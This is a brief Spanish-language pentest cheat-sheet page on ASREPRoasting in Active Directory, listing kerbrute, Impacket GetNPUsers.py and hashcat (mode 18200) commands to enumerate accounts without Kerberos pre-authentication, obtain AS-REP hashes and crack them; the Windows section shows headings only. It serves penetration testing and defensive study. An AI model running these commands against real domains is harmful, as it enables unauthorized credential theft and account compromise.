ASREPRoast

Descripción

Es posible obtener el Ticket Granting Ticket (TGT) para cualquier cuenta que tenga habilitada la configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH).

Linux/Unix

Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.

Kerbrute

kerbrute userenum -d <ACME.LOCAL> --dc <IP-address-DC> <wordlists>
  • <wordlists> = ruta de wordlist de nombres de usuarios de dominio.

Impacket

GetNPUsers.py <ACME.LOCAL>/ -dc-ip <IP-address-DC> -no-pass -usersfile valid-ad-users.txt

Hashcat

Cracking de AS-REP.

hashcat -m 18200 as-rep.txt <path-wordlist>

John the Ripper

Cracking de AS-REP.

Windows

Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.

Obtención de AS-REP de usuario.

Obtención de AS-REP de todos los usuarios.

Habilitar configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH) para un usuario.

Última actualización

¿Te fue útil?